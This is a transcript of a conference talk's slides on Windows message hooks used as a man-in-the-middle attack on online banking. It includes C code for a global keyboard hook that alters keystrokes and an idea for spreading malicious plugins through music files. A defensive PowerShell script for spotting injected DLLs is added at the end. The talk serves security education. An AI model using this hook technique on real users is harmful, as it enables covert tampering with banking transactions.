Attacking the User-Machine Interface (PowerPoint presentation)


  1. Attacking the User-Machine Interface. A speech from Volker Birk, dingens@bumens.org. Chaos Computer Club ERFA Kreis Ulm, http://www.ulm.ccc.de, http://www.ccc.de

  2. What's up?
    - Everybody searches for security for machine-machine interfaces.
    - Some implementations of cryptography are OK for now.
    - Nobody thinks about the security problems of the user-machine interfaces.
  CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  3. Example: internet banking
    [Diagram: PC -> Internet -> Webserver -> Mainframe at the bank. Speech bubble: "I'm in! That was easy!"]

  4. The idea is not really new:

  5. How does the Windoze GUI work?
    - Windoze is a timesharing system
      - hardware drivers in the kernel, mostly interrupt driven
      - processes and threads in the user land
    - Windoze is a message based GUI
      - System Message Queue -> System Dispatcher -> Thread Message Queue -> Thread Dispatcher -> WindowProc for every Window Class.

  6. How does the Windoze GUI System Dispatcher work?
    [Diagram: "Click!" -> IRQ12 -> CPU -> Driver -> System-Message-Q -> Translate -> Dispatcher -> Thread-Message-Q -> Thread -> WM_NCHITTEST -> WindowProc (Message Handler)]

  7. hello, world

    int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                LPSTR lpCmdLine, int nCmdShow) {
        MSG msg;
        if (!hPrevInstance)
            InitApp(hInstance);
        InitInstance(hInstance, nCmdShow);
        /* Thread Dispatcher: pull messages from the thread queue and
           hand them to the WindowProc of the target window */
        while (GetMessage(&msg, NULL, 0, 0)) {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
        return msg.wParam;
    }

  8. hello, world

    ATOM InitApp(HINSTANCE hInstance) {
        WNDCLASSEX wcex;
        memset(&wcex, 0, sizeof(WNDCLASSEX));
        wcex.cbSize        = sizeof(WNDCLASSEX);
        wcex.style         = CS_HREDRAW | CS_VREDRAW;
        wcex.lpfnWndProc   = (WNDPROC) WndProc;      /* Message Handler */
        wcex.hInstance     = hInstance;
        wcex.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
        wcex.hCursor       = LoadCursor(NULL, IDC_ARROW);
        wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
        wcex.lpszClassName = "HelloWorldClass";
        return RegisterClassEx(&wcex);
    }

  9. hello, world

    LRESULT CALLBACK WndProc(HWND hWnd, UINT message,
                             WPARAM wParam, LPARAM lParam) {
        PAINTSTRUCT ps;
        HDC hdc;
        RECT rt;
        switch (message) {
        case WM_PAINT:
            hdc = BeginPaint(hWnd, &ps);
            GetClientRect(hWnd, &rt);
            DrawText(hdc, "hello, world", 12, &rt, DT_CENTER);
            EndPaint(hWnd, &ps);
            break;
        case WM_CLICK:
            ...
        default:
            /* everything not handled here goes to the default handler */
            return DefWindowProc(hWnd, message, wParam, lParam);
        }
        return 0;
    }

  10. The weak point: Hooks.
    - Message Hooks can be installed from any application before any message dispatcher.
    - Messages could be filtered or altered and transported to the Message Handlers.
    - Is there a security system? No, Sir.
    - Attacking pattern: Man in the middle attack.

  11. Man-In-The-Middle-Attack.
    [Diagram: "Click!" -> Windows Message -> Hook -> Application (i.e. IE for banking ;-)]

  12. Code sample

    void InstallHook() {
        m_hLib = LoadLibrary("Hook.dll");
        FARPROC pSysMsgProc = GetProcAddress(m_hLib, "KeyboardProc");
        PSETHOOKHANDLE pSetHookHandle =
            (PSETHOOKHANDLE) GetProcAddress(m_hLib, "SetInfo");
        /* thread id 0: the hook is global, so Windows loads Hook.dll into
           every process with a message loop */
        m_hHook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC) pSysMsgProc, m_hLib, 0);
        (*pSetHookHandle)(m_hHook);
    }

  13. Code sample

    static HHOOK hHook = 0;
    void SetInfo(HHOOK newHook) { hHook = newHook; }

    LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
        if (nCode == HC_ACTION && wParam == VK_DECIMAL) {
            // hPlayback = SetWindowsHookEx(WH_JOURNALPLAYBACK,
            //     JournalPlaybackProc, theApp.m_hInstance, 0);
            if (lParam & 0x80000000)
                keybd_event(13502, 52, KEYEVENTF_KEYUP, 0);
            else
                keybd_event(13502, 52, 0, 0);
            return 1;
        }
        return CallNextHookEx(hHook, nCode, wParam, lParam);
    }

  14. Being creative with internet banking
    - User enters "42", computer understands "23", user reads "42".
    - User is authenticating this transaction.
    - Computer is transacting "23".
    - With an Internet Explorer plugin we don't need any extra processes.
    - Distributing such plugins made easy by using music files with Windows XP.

  15. And now? What can we do?
    - Better forget Windows for banking purposes.
    - Better forget the Macintosh for banking purposes also.
    - X11 offers a security system. But who knows that and who is using it?
    - Better: cold boot from CD.
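One way to look for an injected hook DLL on a machine you are checking, as an added example that is not part of the talk: since a global hook's DLL gets loaded into every process with a message loop, the browser used for banking will show it among its modules. It assumes an elevated PowerShell of the same bitness as the target and uses a placeholder process name.

```powershell
# Added example (not from the talk). Lists the DLLs loaded into a process
# and reports those that are not validly signed or that live outside the
# Windows directory. A hook registered with SetWindowsHookEx(type, proc,
# hLib, 0) makes Windows load hLib into every process that runs a message
# loop, so a foreign hook DLL turns up among the browser's modules.
# Assumptions: run elevated, same bitness as the target; the process name
# below is a placeholder.
param(
    [string]$ProcessName = "iexplore"   # assumed target: the banking browser
)

$windir = $env:SystemRoot

foreach ($proc in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
    try {
        $modules = $proc.Modules
    } catch {
        Write-Warning "Cannot enumerate modules of PID $($proc.Id): $_"
        continue
    }
    foreach ($mod in $modules) {
        $path = $mod.FileName
        $inWindows = $path.StartsWith($windir, [StringComparison]::OrdinalIgnoreCase)
        $sig = Get-AuthenticodeSignature -FilePath $path
        # Unsigned modules, or modules loaded from a user-writable location,
        # are the ones worth a closer look.
        if (-not $inWindows -or $sig.Status -ne "Valid") {
            [PSCustomObject]@{
                Pid    = $proc.Id
                Module = $mod.ModuleName
                Path   = $path
                Signed = $sig.Status
                Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { "" }
            }
        }
    }
}
```

Legitimate third-party browser plugins are listed as well, so compare the output against a baseline taken on a known-clean machine.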

  16. Chaos Computer Club. Kabelsalat ist gesund (cable tangle is healthy). Thank you! Volker Birk, CCC ERFA Kreis Ulm, mailto:dingens@bumens.org, http://www.ulm.ccc.de, http://www.ccc.de
